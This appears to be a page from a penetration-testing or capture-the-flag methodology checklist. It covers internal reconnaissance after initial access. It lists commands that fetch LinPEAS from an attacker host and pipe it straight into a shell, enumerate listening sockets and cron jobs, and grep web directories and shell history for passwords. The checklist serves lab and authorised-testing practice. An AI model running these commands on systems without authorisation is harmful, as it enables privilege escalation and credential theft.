ZeroBox

Phase 06: Internal System & Network Reconnaissance

Run automated internal audit scripts, search for unquoted paths, crontabs, internal sockets, and scavenge plain-text credentials. This phase has 4 checklist items. Placeholders such as {TARGET_IP} are values for your target.

Local Discovery & Credential Hunting

Automated Enumeration Script Execution (LinPEAS / WinPEAS)

Highlight high-probability privilege escalation vectors in color-coded audit output.

curl -L http://{LHOST}:8000/linpeas.sh | sh or .\winPEASany.exe

Internal Loopback Services & Listening Sockets

Locate local-only HTTP services, internal databases, or debugging ports on 127.0.0.1.

ss -tulpn | grep LISTEN or netstat -ano | findstr LISTENING

Process Monitoring & Scheduled Jobs

Inspect recurring tasks running as root or administrative service accounts.

cat /etc/crontab /etc/cron.*/* or schtasks /query /fo LIST /v

Credential Scavenging in Configs, Backups & Histories

Check web database credentials (wp-config.php, .env), bash history, and KeePass databases.

grep -rnwi "password" /var/www/ 2>/dev/null or history | tail -n 50

All phases

  1. Host Discovery & Surface Mapping
  2. Protocol & Service Enumeration
  3. Vulnerability Identification & Threat Modeling
  4. Foothold Execution & Initial Access
  5. Shell Stabilization & Context Triage
  6. Internal System & Network Reconnaissance
  7. Privilege Escalation & Lateral Movement
  8. Post-Exploitation, Flag Vault & Artifact Collection

Tick items off per machine. ZeroBox tracks checklist progress for every target. Open the methodology checklist